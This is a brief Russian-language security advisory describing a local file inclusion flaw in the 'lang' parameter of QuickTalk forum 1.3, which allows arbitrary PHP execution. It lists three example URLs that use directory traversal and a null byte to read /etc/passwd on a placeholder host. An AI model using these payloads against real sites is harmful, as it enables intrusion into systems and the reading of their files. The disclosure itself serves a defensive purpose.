• Партнер

  • Программа: QuickTalk forum 1.3

    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
    Уязвимость существует из-за недостаточной обработки входных данных в параметре «lang» множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. 

    Примеры:

    http://www.site.com/[path]/qtf_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
    http://www.site.com/[path]/qtf_j_birth.php?lang=./../../../../../../../../../../etc/passwd%00
    http://www.site.com/[path]/qtf_j_exists.php?lang=./../../../../../../../../../../etc/passwd%00

    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии